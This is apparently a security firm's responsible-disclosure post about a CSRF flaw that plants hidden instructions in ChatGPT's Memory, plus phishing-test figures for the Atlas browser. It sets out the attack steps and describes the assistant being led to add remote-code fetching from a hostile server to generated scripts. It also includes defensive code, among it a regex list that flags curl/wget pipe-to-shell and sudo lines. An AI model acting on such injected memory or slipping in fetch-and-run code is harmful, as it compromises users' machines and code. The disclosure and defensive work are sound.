LayerX discovered the first vulnerability impacting OpenAI’s new ChatGPT Atlas browser, allowing bad actors to inject malicious instructions into ChatGPT’s “memory” and execute remote code. This exploit can allow attackers to infect systems with malicious code, grant themselves access privileges, or deploy malware.

The vulnerability affects ChatGPT users on any browser, but it is particularly dangerous for users of OpenAI’s new agentic browser: ChatGPT Atlas. LayerX has found that Atlas currently does not include any meaningful anti-phishing protections, meaning that users of this browser are up to 90% more vulnerable to phishing attacks than users of traditional browsers like Chrome or Edge.

The exploit has been reported to OpenAI under Responsible Disclosure procedures. A summary is provided below, withholding technical information that would allow attackers to replicate the attack.

TL;DR: How The Exploit Works:



LayerX discovered how attackers can use a Cross-Site Request Forgery (CSRF) request to “piggyback” on the victim’s ChatGPT access credentials, in order to inject malicious instructions into ChatGPT’s memory. Then, when the user attempts to use ChatGPT for legitimate purposes, the tainted memories will be invoked, and can execute remote code that will allow the attacker to gain control of the user account, their browser, code they are writing, or systems they have access to.

While this vulnerability affects ChatGPT users on any browser, it is particularly dangerous for users of ChatGPT Atlas browser, since they are, by default, logged-in to ChatGPT, and since LayerX testing indicates that the Atlas browser is up to 90% more exposed than Chrome and Edge to phishing attacks.

A Step-by-Step Explanation:

- Initially, the user is logged-in to ChatGPT, and holds an authentication cookie or token in their browser.

- The user clicks a malicious link, leading them to a compromised web page.

- The malicious page invokes a Cross-Site Request Forgery (CSRF) request to take advantage of the user’s pre-existing authentication into ChatGPT.

- The CSRF exploit injects hidden instructions into ChatGPT’s memory, without the user’s knowledge, thereby “tainting” the core LLM memory.

- The next time the user queries ChatGPT, the tainted memories are invoked, allowing deployment of malicious code that can give attackers control over systems or code.

Using Cross-Site Request Forgery (CSRF) To Access LLMs:

A cross-site request forgery (CSRF) attack is when an attacker tricks a user’s browser into sending an unintended, state-changing request to a website where the user is already authenticated, causing the site to perform actions as that user without their consent.

The attack occurs when a victim is logged in to a target site, which has session cookies stored in the browser. The victim visits or is redirected into a malicious page that issues a crafted request (via a form, image tag, link, or script) to the target site. The browser automatically includes the victim’s credentials (cookies, auth headers), so the target site processes the request as if the user initiated it.
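One browser-side mitigation for the automatic credential attachment described above is the `SameSite` cookie attribute, which tells the browser not to send a cookie on cross-site requests. The sketch below uses Python's standard `http.cookies` module. The cookie name `session` and the helper `build_session_cookie` are illustrative assumptions, not details of how ChatGPT issues its credentials.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value for a hardened session cookie.

    The cookie name "session" is a hypothetical choice for this sketch.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    # Strict: the browser omits this cookie on requests initiated by other sites.
    cookie["session"]["samesite"] = "Strict"
    # Secure: only send the cookie over HTTPS.
    cookie["session"]["secure"] = True
    # HttpOnly: keep the cookie out of reach of page scripts.
    cookie["session"]["httponly"] = True
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    print("Set-Cookie:", build_session_cookie("opaque-session-id"))
```

`SameSite` only governs cookies. Credentials that a page attaches in other ways need separate server-side checks.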

In most cases, a CSRF attack targets actions such as changing the account email or password, initiating funds transfers, or making purchases under the user’s session.

However, when the target is an AI system, a CSRF attack can let attackers reach the AI systems that the user is logged in to, query them, or inject instructions into them.
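CSRF works because the server accepts a cookie-authenticated, state-changing request without verifying where it came from. As a minimal defensive sketch, a server can require both a trusted `Origin` (or `Referer`) and a per-session anti-CSRF token. Everything named here (`is_request_allowed`, the `X-CSRF-Token` header, the trusted origin) is an assumption made for illustration and does not describe OpenAI's implementation.

```python
import hmac
from urllib.parse import urlsplit

# Methods that should never change state and are therefore not checked here.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_of(url: str) -> str:
    """Return scheme://host[:port] for a URL, or '' if it is not absolute."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return ""
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_request_allowed(method, headers, session_csrf_token, trusted_origins):
    """Decide whether a cookie-authenticated request should be processed."""
    if method.upper() in SAFE_METHODS:
        return True
    normalized = {name.lower(): value for name, value in headers.items()}
    # Check 1: the request must originate from a page we trust.
    source = normalized.get("origin") or normalized.get("referer", "")
    if origin_of(source) not in trusted_origins:
        return False
    # Check 2: the request must carry the secret token tied to this session,
    # which a page on another site cannot read.
    submitted = normalized.get("x-csrf-token", "")
    if not session_csrf_token:
        return False
    return hmac.compare_digest(submitted.encode(), session_csrf_token.encode())


if __name__ == "__main__":
    trusted = {"https://app.example"}  # hypothetical first-party origin
    forged = {"Origin": "https://evil.example", "X-CSRF-Token": "guess"}
    print(is_request_allowed("POST", forged, "real-token", trusted))
```

With these checks, a request forged from another site fails on both counts: its `Origin` is not trusted, and the attacker's page has no way to learn the session's token.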

Infecting ChatGPT’s Core “Memory”

ChatGPT’s “Memory” allows ChatGPT to remember useful details about users’ queries, chats and activities, such as preferences, constraints, projects, style notes, etc., and reuse them across future chats so that users don’t have to repeat themselves. In effect, it acts like the LLM’s background memory or subconscious.

Once attackers have access to the user’s ChatGPT via the CSRF request, they can use it to inject hidden instructions into ChatGPT that will affect future chats.

Like a person’s subconscious, once the right instructions are stored inside ChatGPT’s Memory, ChatGPT will be compelled to execute these instructions, effectively becoming a malicious co-conspirator.

Moreover, once an account’s Memory has been infected, this infection is persistent across all devices that the account is used on – across home and work computers, and across different browsers – whether a user is using them on Chrome, Atlas, or any other browser. This makes the attack extremely “sticky,” and is especially dangerous for users who use the same account for both work and personal purposes.



ChatGPT Atlas Users Up to 90% More Exposed Than Other Browsers

While this vulnerability can be used against ChatGPT users on any browser, users of OpenAI’s ChatGPT Atlas browser are particularly vulnerable. This is for two reasons:

- When you are using Atlas, you are, by default, logged-in to ChatGPT. This means that ChatGPT credentials are always stored in the browser, where they can be targeted by malicious CSRF requests.

- ChatGPT Atlas is particularly bad at stopping phishing attacks. This means that users of Atlas are more exposed than users of other browsers.



LayerX tested Atlas against over 100 in-the-wild web vulnerabilities and phishing attacks. LayerX previously conducted the same test against other AI browsers such as Comet, Dia, and Genspark. The results were uninspiring, to say the least:

In the previous tests, whereas traditional browsers such as Edge and Chrome were able to stop about 50% of phishing attacks using their out-of-the-box protections, Comet and Genspark stopped only 7% (Dia generated results similar to those of Chrome).

Running the same test against Atlas showed even more stark results:

Out of 103 in-the-wild attacks that LayerX tested, ChatGPT Atlas allowed 97 to go through, a whopping 94.2% failure rate.

Compared to Edge (which stopped 53% of attacks in LayerX’s test) and Chrome (which stopped 47% of attacks), ChatGPT Atlas was able to successfully stop only 5.8% of malicious web pages, meaning that users of Atlas were nearly 90% more vulnerable to phishing attacks, compared to users of other browsers.
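The percentages above can be reproduced with a few lines of arithmetic. The sketch below assumes that “nearly 90% more vulnerable” compares Atlas’s failure rate with the roughly 50% failure rate of traditional browsers. The source does not state the exact formula, so this is one plausible reading, and the function names are illustrative.

```python
def failure_rate(allowed: int, total: int) -> float:
    """Fraction of tested attacks that the browser let through."""
    return allowed / total


def relative_exposure(failure: float, baseline_failure: float) -> float:
    """How much higher one failure rate is than a baseline (0.5 means 50% more)."""
    return failure / baseline_failure - 1.0


# Figures reported in the text: 97 of 103 attacks got past Atlas.
atlas_failure = failure_rate(allowed=97, total=103)
atlas_blocked = 1.0 - atlas_failure

# Baselines: "about 50%" blocked overall, Edge blocked 53%, Chrome blocked 47%.
vs_baseline = relative_exposure(atlas_failure, baseline_failure=0.50)
vs_edge = relative_exposure(atlas_failure, baseline_failure=1 - 0.53)
vs_chrome = relative_exposure(atlas_failure, baseline_failure=1 - 0.47)

if __name__ == "__main__":
    print(f"Atlas failure rate:        {atlas_failure:.1%}")
    print(f"Atlas block rate:          {atlas_blocked:.1%}")
    print(f"Exposure vs ~50% baseline: {vs_baseline:.1%}")
    print(f"Exposure vs Edge:          {vs_edge:.1%}")
    print(f"Exposure vs Chrome:        {vs_chrome:.1%}")
```

Under this reading, the relative exposure is roughly 88% against a 50% baseline, about 100% against Edge alone, and about 78% against Chrome alone, which is consistent with the “nearly 90%” summary figure.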

The implication is that users of ChatGPT Atlas are not only susceptible to attack vectors that can inject malicious instructions into their ChatGPT accounts. Because Atlas does not include any meaningful anti-phishing protection, they are also at greater risk of being exposed to those attacks in the first place.



Proof of Concept: Injecting Malicious Code To ‘Vibe’ Coding



Below is an illustration of an attack vector exploiting this vulnerability, on an Atlas browser user who is vibe coding:

“Vibe coding” is a collaborative style where the developer treats the AI as a creative partner rather than a line-by-line executor. Instead of prescribing exact syntax, the developer shares the project’s intent and feel (e.g., architecture goals, tone, audience, aesthetic preferences, etc.) and other non-functional requirements.

ChatGPT then uses this holistic brief to produce code that works and matches the requested style, narrowing the gap between high-level ideas and low-level implementation. The developer’s role shifts from hand-coding to steering and refining the AI’s interpretation.

However, this exact flexibility can also be abused. An attacker could nudge an AI assistant into generating code that looks like a harmless feature or quick fix but quietly adds backdoors, covert data exfiltration, or other tampering.

For example, in this case, nothing appears unusual from the user’s perspective, but when they ask ChatGPT to write code, the assistant may follow the request and slip in attacker-guided instructions. The generated script could, for instance, fetch remote code (e.g., from a hostile server) and attempt to run it with elevated privileges.
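Separately from the proof of concept, a developer who accepts AI-generated code may want an independent check for the fetch-and-run pattern described above. The following is a minimal heuristic sketch, not a LayerX or OpenAI tool: the pattern list, the labels, and the function `flag_suspicious_lines` are assumptions made for illustration, and a determined attacker can evade simple regular expressions.

```python
import re

# Hypothetical, deliberately small set of patterns worth a manual review.
SUSPICIOUS_PATTERNS = {
    # Downloading a script and piping it straight into a shell.
    "pipe-to-shell": re.compile(
        r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
    ),
    # Evaluating content fetched over the network.
    "exec-of-download": re.compile(
        r"\b(?:exec|eval)\s*\([^\n]*\b(?:urlopen|requests\.get)\b"
    ),
    # Requests for elevated privileges.
    "elevated-privileges": re.compile(r"\bsudo\b"),
}


def flag_suspicious_lines(code: str):
    """Return (line_number, label, line) for every line matching a pattern."""
    findings = []
    for number, line in enumerate(code.splitlines(), start=1):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label, line.strip()))
    return findings


if __name__ == "__main__":
    # "server.example" is a placeholder host, not one taken from the report.
    generated = (
        "echo 'installing dependencies'\n"
        "curl -s http://server.example/setup.sh | sudo bash\n"
    )
    for number, label, line in flag_suspicious_lines(generated):
        print(f"line {number}: {label}: {line}")
```

A check like this does not replace reading the generated code. It only makes the riskiest lines harder to overlook in a long response.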

To illustrate, in this case, acting on the malicious instructions, ChatGPT added remote code to the generated script, which the user would unknowingly download to their computer from server.rapture:

While ChatGPT offers some defenses against malicious instructions, effectiveness can vary with the attack’s sophistication and how the unwanted behavior entered Memory.

In some cases, the user may see a mild warning; in others, the attempt might be blocked. However, if cleverly masked, the code could evade detection altogether. For example, this is the subtle warning that this script received. At most, it’s a sidenote that is easy to miss within the blob of text: